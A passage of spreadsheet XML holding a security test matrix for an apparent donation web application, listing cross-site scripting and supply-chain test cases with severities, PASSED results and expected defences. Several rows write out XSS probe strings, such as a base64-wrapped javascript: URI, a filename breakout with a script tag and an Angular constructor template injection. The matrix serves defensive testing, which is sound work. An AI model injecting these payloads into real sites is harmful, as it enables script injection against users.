          <t>Set link href to javascript:eval(atob('YWxlcnQoMSk='))</t>
        </is>
      </c>
      <c r="E211" s="16" t="inlineStr">
        <is>
          <t>javascript: URI payload</t>
        </is>
      </c>
      <c r="F211" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G211" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H211" s="16" t="inlineStr">
        <is>
          <t>URL validator enforces http:// or https:// protocol whitelist</t>
        </is>
      </c>
    </row>
    <row r="212" ht="22" customHeight="1">
      <c r="A212" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-021</t>
        </is>
      </c>
      <c r="B212" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C212" s="16" t="inlineStr">
        <is>
          <t>XSS in File Download Filename Prompt</t>
        </is>
      </c>
      <c r="D212" s="16" t="inlineStr">
        <is>
          <t>Set Content-Disposition filename to '"&gt;&lt;script&gt;alert(1)&lt;/script&gt;.pdf</t>
        </is>
      </c>
      <c r="E212" s="16" t="inlineStr">
        <is>
          <t>Content-Disposition XSS</t>
        </is>
      </c>
      <c r="F212" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G212" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H212" s="16" t="inlineStr">
        <is>
          <t>Filename parameter sanitized and quote-escaped in HTTP header</t>
        </is>
      </c>
    </row>
    <row r="213" ht="22" customHeight="1">
      <c r="A213" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-022</t>
        </is>
      </c>
      <c r="B213" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C213" s="16" t="inlineStr">
        <is>
          <t>XSS via Window.name Variable</t>
        </is>
      </c>
      <c r="D213" s="16" t="inlineStr">
        <is>
          <t>Set window.name to payload and open application popup</t>
        </is>
      </c>
      <c r="E213" s="16" t="inlineStr">
        <is>
          <t>window.name XSS payload</t>
        </is>
      </c>
      <c r="F213" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G213" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H213" s="16" t="inlineStr">
        <is>
          <t>Application ignores window.name for state initialization</t>
        </is>
      </c>
    </row>
    <row r="214" ht="22" customHeight="1">
      <c r="A214" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-023</t>
        </is>
      </c>
      <c r="B214" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C214" s="16" t="inlineStr">
        <is>
          <t>XSS via PostMessage Event Handler</t>
        </is>
      </c>
      <c r="D214" s="16" t="inlineStr">
        <is>
          <t>Send malicious postMessage payload from external domain window</t>
        </is>
      </c>
      <c r="E214" s="16" t="inlineStr">
        <is>
          <t>postMessage XSS payload</t>
        </is>
      </c>
      <c r="F214" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G214" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H214" s="16" t="inlineStr">
        <is>
          <t>Message event handler validates event.origin before processing data</t>
        </is>
      </c>
    </row>
    <row r="215" ht="22" customHeight="1">
      <c r="A215" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-024</t>
        </is>
      </c>
      <c r="B215" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C215" s="16" t="inlineStr">
        <is>
          <t>XSS via Template Literal Interpolation</t>
        </is>
      </c>
      <c r="D215" s="16" t="inlineStr">
        <is>
          <t>Inject `${alert(1)}` into template string input</t>
        </is>
      </c>
      <c r="E215" s="16" t="inlineStr">
        <is>
          <t>Template literal XSS</t>
        </is>
      </c>
      <c r="F215" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G215" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H215" s="16" t="inlineStr">
        <is>
          <t>User input treated as literal string; Code execution prevented</t>
        </is>
      </c>
    </row>
    <row r="216" ht="22" customHeight="1">
      <c r="A216" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-025</t>
        </is>
      </c>
      <c r="B216" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C216" s="16" t="inlineStr">
        <is>
          <t>XSS via AngularJS / Vue.js Client Template Injection</t>
        </is>
      </c>
      <c r="D216" s="16" t="inlineStr">
        <is>
          <t>Inject {{constructor.constructor('alert(1)')()}} into input</t>
        </is>
      </c>
      <c r="E216" s="16" t="inlineStr">
        <is>
          <t>Client template injection</t>
        </is>
      </c>
      <c r="F216" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G216" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H216" s="16" t="inlineStr">
        <is>
          <t>Client framework template delimiters escaped in user content</t>
        </is>
      </c>
    </row>
    <row r="217" ht="22" customHeight="1">
      <c r="A217" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-026</t>
        </is>
      </c>
      <c r="B217" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C217" s="16" t="inlineStr">
        <is>
          <t>XSS in RSS / Atom Feed Generator</t>
        </is>
      </c>
      <c r="D217" s="16" t="inlineStr">
        <is>
          <t>Inject XSS payload into donation title for RSS feed</t>
        </is>
      </c>
      <c r="E217" s="16" t="inlineStr">
        <is>
          <t>RSS Feed XSS payload</t>
        </is>
      </c>
      <c r="F217" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G217" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H217" s="16" t="inlineStr">
        <is>
          <t>RSS XML generator escapes special XML characters (&amp;lt; &amp;gt; &amp;amp;)</t>
        </is>
      </c>
    </row>
    <row r="218" ht="22" customHeight="1">
      <c r="A218" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-027</t>
        </is>
      </c>
      <c r="B218" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C218" s="16" t="inlineStr">
        <is>
          <t>XSS via VTT / Subtitle File Upload</t>
        </is>
      </c>
      <c r="D218" s="16" t="inlineStr">
        <is>
          <t>Upload WebVTT subtitle file containing XSS payload</t>
        </is>
      </c>
      <c r="E218" s="16" t="inlineStr">
        <is>
          <t>WebVTT XSS payload</t>
        </is>
      </c>
      <c r="F218" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G218" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H218" s="16" t="inlineStr">
        <is>
          <t>Subtitle parser extracts text cues only; Strip HTML tags</t>
        </is>
      </c>
    </row>
    <row r="219" ht="22" customHeight="1">
      <c r="A219" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-028</t>
        </is>
      </c>
      <c r="B219" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C219" s="16" t="inlineStr">
        <is>
          <t>XSS in Web Application Firewall (WAF) Error Page</t>
        </is>
      </c>
      <c r="D219" s="16" t="inlineStr">
        <is>
          <t>Send WAF trigger payload with embedded XSS string</t>
        </is>
      </c>
      <c r="E219" s="16" t="inlineStr">
        <is>
          <t>WAF page XSS payload</t>
        </is>
      </c>
      <c r="F219" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G219" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H219" s="16" t="inlineStr">
        <is>
          <t>WAF block page renders blocked request ID without echoing payload</t>
        </is>
      </c>
    </row>
    <row r="220" ht="22" customHeight="1">
      <c r="A220" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-029</t>
        </is>
      </c>
      <c r="B220" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C220" s="16" t="inlineStr">
        <is>
          <t>XSS via Cookies / Document.cookie Manipulation</t>
        </is>
      </c>
      <c r="D220" s="16" t="inlineStr">
        <is>
          <t>Inject XSS payload into cookie value via header injection</t>
        </is>
      </c>
      <c r="E220" s="16" t="inlineStr">
        <is>
          <t>Cookie XSS payload</t>
        </is>
      </c>
      <c r="F220" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G220" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H220" s="16" t="inlineStr">
        <is>
          <t>Cookies parsed securely; Output escaped if displayed in UI</t>
        </is>
      </c>
    </row>
    <row r="221" ht="22" customHeight="1">
      <c r="A221" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-030</t>
        </is>
      </c>
      <c r="B221" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C221" s="16" t="inlineStr">
        <is>
          <t>XSS Mutation (mXSS) Defense</t>
        </is>
      </c>
      <c r="D221" s="16" t="inlineStr">
        <is>
          <t>Inject innerHTML payload designed to mutate during browser parsing</t>
        </is>
      </c>
      <c r="E221" s="16" t="inlineStr">
        <is>
          <t>mXSS payload</t>
        </is>
      </c>
      <c r="F221" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G221" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H221" s="16" t="inlineStr">
        <is>
          <t>Uses DOMPurify with mXSS defense enabled; DOM structure sanitized</t>
        </is>
      </c>
    </row>
    <row r="222" ht="22" customHeight="1">
      <c r="A222" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-031</t>
        </is>
      </c>
      <c r="B222" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C222" s="16" t="inlineStr">
        <is>
          <t>XSS via PDF Viewer Form Fields</t>
        </is>
      </c>
      <c r="D222" s="16" t="inlineStr">
        <is>
          <t>Inject script in PDF form field value</t>
        </is>
      </c>
      <c r="E222" s="16" t="inlineStr">
        <is>
          <t>PDF XSS payload</t>
        </is>
      </c>
      <c r="F222" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G222" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H222" s="16" t="inlineStr">
        <is>
          <t>PDF renderer strips JavaScript execution context</t>
        </is>
      </c>
    </row>
    <row r="223" ht="22" customHeight="1">
      <c r="A223" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-032</t>
        </is>
      </c>
      <c r="B223" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C223" s="16" t="inlineStr">
        <is>
          <t>XSS in OAuth Consent Dialog Display</t>
        </is>
      </c>
      <c r="D223" s="16" t="inlineStr">
        <is>
          <t>Pass script in OAuth app title string</t>
        </is>
      </c>
      <c r="E223" s="16" t="inlineStr">
        <is>
          <t>OAuth app title XSS</t>
        </is>
      </c>
      <c r="F223" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G223" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H223" s="16" t="inlineStr">
        <is>
          <t>Consent screen encodes application display name</t>
        </is>
      </c>
    </row>
    <row r="224" ht="22" customHeight="1">
      <c r="A224" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-033</t>
        </is>
      </c>
      <c r="B224" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C224" s="16" t="inlineStr">
        <is>
          <t>XSS in Web Notification Payload</t>
        </is>
      </c>
      <c r="D224" s="16" t="inlineStr">
        <is>
          <t>Push notification containing script in body</t>
        </is>
      </c>
      <c r="E224" s="16" t="inlineStr">
        <is>
          <t>Push Notification XSS</t>
        </is>
      </c>
      <c r="F224" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G224" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H224" s="16" t="inlineStr">
        <is>
          <t>Browser push notification renders title and body as plain text</t>
        </is>
      </c>
    </row>
    <row r="225" ht="22" customHeight="1">
      <c r="A225" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-034</t>
        </is>
      </c>
      <c r="B225" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C225" s="16" t="inlineStr">
        <is>
          <t>XSS via Service Worker Caching</t>
        </is>
      </c>
      <c r="D225" s="16" t="inlineStr">
        <is>
          <t>Store XSS payload in Service Worker cache</t>
        </is>
      </c>
      <c r="E225" s="16" t="inlineStr">
        <is>
          <t>SW Cache XSS</t>
        </is>
      </c>
      <c r="F225" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G225" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H225" s="16" t="inlineStr">
        <is>
          <t>Service Worker script origin strictly validated; Cache sanitized</t>
        </is>
      </c>
    </row>
    <row r="226" ht="22" customHeight="1">
      <c r="A226" s="15" t="inlineStr">
        <is>
          <t>SEC-XSS-035</t>
        </is>
      </c>
      <c r="B226" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS)</t>
        </is>
      </c>
      <c r="C226" s="16" t="inlineStr">
        <is>
          <t>XSS in User Feedback Floating Widget</t>
        </is>
      </c>
      <c r="D226" s="16" t="inlineStr">
        <is>
          <t>Inject script in feedback message area</t>
        </is>
      </c>
      <c r="E226" s="16" t="inlineStr">
        <is>
          <t>Feedback Widget XSS</t>
        </is>
      </c>
      <c r="F226" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G226" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H226" s="16" t="inlineStr">
        <is>
          <t>Feedback widget uses textContent for dynamic text node rendering</t>
        </is>
      </c>
    </row>
    <row r="227" ht="22" customHeight="1">
      <c r="A227" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-001</t>
        </is>
      </c>
      <c r="B227" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C227" s="16" t="inlineStr">
        <is>
          <t>NPM Dependency Vulnerability Audit</t>
        </is>
      </c>
      <c r="D227" s="16" t="inlineStr">
        <is>
          <t>Run npm audit scanner across all project node_modules</t>
        </is>
      </c>
      <c r="E227" s="16" t="inlineStr">
        <is>
          <t>npm audit --audit-level=high</t>
        </is>
      </c>
      <c r="F227" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G227" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H227" s="16" t="inlineStr">
        <is>
          <t>0 High or Critical vulnerabilities detected in production dependencies</t>
        </is>
      </c>
    </row>
    <row r="228" ht="22" customHeight="1">
      <c r="A228" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-002</t>
        </is>
      </c>
      <c r="B228" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C228" s="16" t="inlineStr">
        <is>
          <t>Python Pip Package Security Audit</t>
        </is>
      </c>
      <c r="D228" s="16" t="inlineStr">
        <is>
          <t>Run safety check / pip-audit on python dependencies</t>
        </is>
      </c>
      <c r="E228" s="16" t="inlineStr">
        <is>
          <t>pip-audit requirement check</t>
        </is>
      </c>
      <c r="F228" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G228" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H228" s="16" t="inlineStr">
        <is>
          <t>0 Known CVEs found in openpyxl, Flask, or backend python libs</t>
        </is>
      </c>
    </row>
    <row r="229" ht="22" customHeight="1">
      <c r="A229" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-003</t>
        </is>
      </c>
      <c r="B229" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C229" s="16" t="inlineStr">
        <is>
          <t>Lockfile Integrity Verification</t>
        </is>
      </c>
      <c r="D229" s="16" t="inlineStr">
        <is>
          <t>Validate package-lock.json integrity hashes (sha512)</t>
        </is>
      </c>
      <c r="E229" s="16" t="inlineStr">
        <is>
          <t>Lockfile hash check</t>
        </is>
      </c>
      <c r="F229" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G229" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H229" s="16" t="inlineStr">
        <is>
          <t>All package integrity hashes verified against official npm registry</t>
        </is>
      </c>
    </row>
    <row r="230" ht="22" customHeight="1">
      <c r="A230" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-004</t>
        </is>
      </c>
      <c r="B230" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C230" s="16" t="inlineStr">
        <is>
          <t>Typosquatting Package Prevention</t>
        </is>
      </c>
      <c r="D230" s="16" t="inlineStr">
        <is>
          <t>Audit package.json for misspelled popular package names</t>
        </is>
      </c>
      <c r="E230" s="16" t="inlineStr">
        <is>
          <t>Package name audit</t>
        </is>
      </c>
      <c r="F230" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G230" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H230" s="16" t="inlineStr">
        <is>
          <t>All dependencies sourced from official verified publishers</t>
        </is>
      </c>
    </row>
    <row r="231" ht="22" customHeight="1">
      <c r="A231" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-005</t>
        </is>
      </c>
      <c r="B231" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C231" s="16" t="inlineStr">
        <is>
          <t>Dependency Pinning &amp; Version Enforcement</t>
        </is>
      </c>
      <c r="D231" s="16" t="inlineStr">
        <is>
          <t>Inspect package.json for unpinned wildcard versions (^ or *)</t>
        </is>
      </c>
      <c r="E231" s="16" t="inlineStr">
        <is>
          <t>Version specifier check</t>
        </is>
      </c>
      <c r="F231" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G231" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H231" s="16" t="inlineStr">
        <is>
          <t>Dependencies pinned to explicit release versions for reproducible builds</t>
        </is>
      </c>
    </row>
    <row r="232" ht="22" customHeight="1">
      <c r="A232" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-006</t>
        </is>
      </c>
      <c r="B232" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C232" s="16" t="inlineStr">
        <is>
          <t>Private Package Registry Security</t>
        </is>
      </c>
      <c r="D232" s="16" t="inlineStr">
        <is>
          <t>Inspect npm configuration for scoped packages</t>
        </is>
      </c>
      <c r="E232" s="16" t="inlineStr">
        <is>
          <t>npmrc registry check</t>
        </is>
      </c>
      <c r="F232" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G232" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H232" s="16" t="inlineStr">
        <is>
          <t>Scoped packages routed exclusively to private corporate artifact repository</t>
        </is>
      </c>
    </row>
    <row r="233" ht="22" customHeight="1">
      <c r="A233" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-007</t>
        </is>
      </c>
      <c r="B233" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C233" s="16" t="inlineStr">
        <is>
          <t>Malicious Package Post-Install Script Execution</t>
        </is>
      </c>
      <c r="D233" s="16" t="inlineStr">
        <is>
          <t>Inspect dependencies for suspicious postinstall hooks</t>
        </is>
      </c>
      <c r="E233" s="16" t="inlineStr">
        <is>
          <t>Postinstall script check</t>
        </is>
      </c>
      <c r="F233" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G233" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H233" s="16" t="inlineStr">
        <is>
          <t>npm ignore-scripts configured in CI build pipeline</t>
        </is>
      </c>
    </row>
    <row r="234" ht="22" customHeight="1">
      <c r="A234" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-008</t>
        </is>
      </c>
      <c r="B234" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C234" s="16" t="inlineStr">
        <is>
          <t>Unused Dependency Cleanup Audit</t>
        </is>
      </c>
      <c r="D234" s="16" t="inlineStr">
        <is>
          <t>Run depcheck tool to identify obsolete codebase packages</t>
        </is>
      </c>
      <c r="E234" s="16" t="inlineStr">
        <is>
          <t>depcheck execution</t>
        </is>
      </c>
      <c r="F234" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G234" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H234" s="16" t="inlineStr">
        <is>
          <t>Unused dependencies purged; Attack surface minimized</t>
        </is>
      </c>
    </row>
    <row r="235" ht="22" customHeight="1">
      <c r="A235" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-009</t>
        </is>
      </c>
      <c r="B235" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C235" s="16" t="inlineStr">
        <is>
          <t>Third-Party Script Vendor Audit</t>
        </is>
      </c>
      <c r="D235" s="16" t="inlineStr">
        <is>
          <t>Inspect external JS SDKs loaded in HTML head</t>
        </is>
      </c>
      <c r="E235" s="16" t="inlineStr">
        <is>
          <t>External script audit</t>
        </is>
      </c>
      <c r="F235" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G235" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H235" s="16" t="inlineStr">
        <is>
          <t>External scripts minimized; SRI hash integrity checks enforced</t>
        </is>
      </c>
    </row>
    <row r="236" ht="22" customHeight="1">
      <c r="A236" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-010</t>
        </is>
      </c>
      <c r="B236" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C236" s="16" t="inlineStr">
        <is>
          <t>Container Image Vulnerability Scanning</t>
        </is>
      </c>
      <c r="D236" s="16" t="inlineStr">
        <is>
          <t>Run Trivy / Grype container scanner on Docker build image</t>
        </is>
      </c>
      <c r="E236" s="16" t="inlineStr">
        <is>
          <t>Trivy image scan</t>
        </is>
      </c>
      <c r="F236" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G236" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H236" s="16" t="inlineStr">
        <is>
          <t>0 Critical vulnerability CVEs found in base OS image</t>
        </is>
      </c>
    </row>
    <row r="237" ht="22" customHeight="1">
      <c r="A237" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-011</t>
        </is>
      </c>
      <c r="B237" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C237" s="16" t="inlineStr">
        <is>
          <t>Software Bill of Materials (SBOM) Generation</t>
        </is>
      </c>
      <c r="D237" s="16" t="inlineStr">
        <is>
          <t>Generate CycloneDX SBOM report for production release</t>
        </is>
      </c>
      <c r="E237" s="16" t="inlineStr">
        <is>
          <t>SBOM generation audit</t>
        </is>
      </c>
      <c r="F237" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G237" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H237" s="16" t="inlineStr">
        <is>
          <t>SBOM generated and verified against NVD vulnerability database</t>
        </is>
      </c>
    </row>
    <row r="238" ht="22" customHeight="1">
      <c r="A238" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-012</t>
        </is>
      </c>
      <c r="B238" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C238" s="16" t="inlineStr">
        <is>
          <t>Outdated Open-Source License Audit</t>
        </is>
      </c>
      <c r="D238" s="16" t="inlineStr">
        <is>
          <t>Scan dependency licenses for GPL / Copyleft compliance</t>
        </is>
      </c>
      <c r="E238" s="16" t="inlineStr">
        <is>
          <t>License compliance check</t>
        </is>
      </c>
      <c r="F238" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G238" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H238" s="16" t="inlineStr">
        <is>
          <t>All packages use permissive licenses (MIT, Apache-2.0, BSD)</t>
        </is>
      </c>
    </row>
    <row r="239" ht="22" customHeight="1">
      <c r="A239" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-013</t>
        </is>
      </c>
      <c r="B239" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C239" s="16" t="inlineStr">
        <is>
          <t>Git Commit Signing (GPG) Verification</t>
        </is>
      </c>
      <c r="D239" s="16" t="inlineStr">
        <is>
          <t>Inspect git commit logs for GPG signature validation</t>
        </is>
      </c>
      <c r="E239" s="16" t="inlineStr">
        <is>
          <t>Git log signature check</t>
        </is>
      </c>
      <c r="F239" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G239" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H239" s="16" t="inlineStr">
        <is>
          <t>All release commits signed with verified developer GPG keys</t>
        </is>
      </c>
    </row>
    <row r="240" ht="22" customHeight="1">
      <c r="A240" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-014</t>
        </is>
      </c>
      <c r="B240" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C240" s="16" t="inlineStr">
        <is>
          <t>CI/CD Pipeline Script Security Audit</t>
        </is>
      </c>
      <c r="D240" s="16" t="inlineStr">
        <is>
          <t>Inspect GitHub Actions workflow files for unpinned actions</t>
        </is>
      </c>
      <c r="E240" s="16" t="inlineStr">
        <is>
          <t>Workflow action pinning</t>
        </is>
      </c>
      <c r="F240" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G240" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H240" s="16" t="inlineStr">
        <is>
          <t>GitHub Actions pinned to explicit commit SHA hashes</t>
        </is>
      </c>
    </row>
    <row r="241" ht="22" customHeight="1">
      <c r="A241" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-015</t>
        </is>
      </c>
      <c r="B241" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C241" s="16" t="inlineStr">
        <is>
          <t>Secrets Scanner Pre-Commit Hook Enforcement</t>
        </is>
      </c>
      <c r="D241" s="16" t="inlineStr">
        <is>
          <t>Attempt commit containing fake API secret key</t>
        </is>
      </c>
      <c r="E241" s="16" t="inlineStr">
        <is>
          <t>Pre-commit hook test</t>
        </is>
      </c>
      <c r="F241" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G241" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H241" s="16" t="inlineStr">
        <is>
          <t>Git pre-commit hook (trufflehog/gitleaks) blocks commit</t>
        </is>
      </c>
    </row>
    <row r="242" ht="22" customHeight="1">
      <c r="A242" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-016</t>
        </is>
      </c>
      <c r="B242" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C242" s="16" t="inlineStr">
        <is>
          <t>Code Deprecation &amp; End-Of-Life (EOL) Check</t>
        </is>
      </c>
      <c r="D242" s="16" t="inlineStr">
        <is>
          <t>Inspect Node.js / Python runtime version lifecycle</t>
        </is>
      </c>
      <c r="E242" s="16" t="inlineStr">
        <is>
          <t>Runtime EOL check</t>
        </is>
      </c>
      <c r="F242" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G242" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H242" s="16" t="inlineStr">
        <is>
          <t>Runtime environment uses active LTS release (Node 20 / Python 3.12)</t>
        </is>
      </c>
    </row>
    <row r="243" ht="22" customHeight="1">
      <c r="A243" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-017</t>
        </is>
      </c>
      <c r="B243" s="16" t="inlineStr">
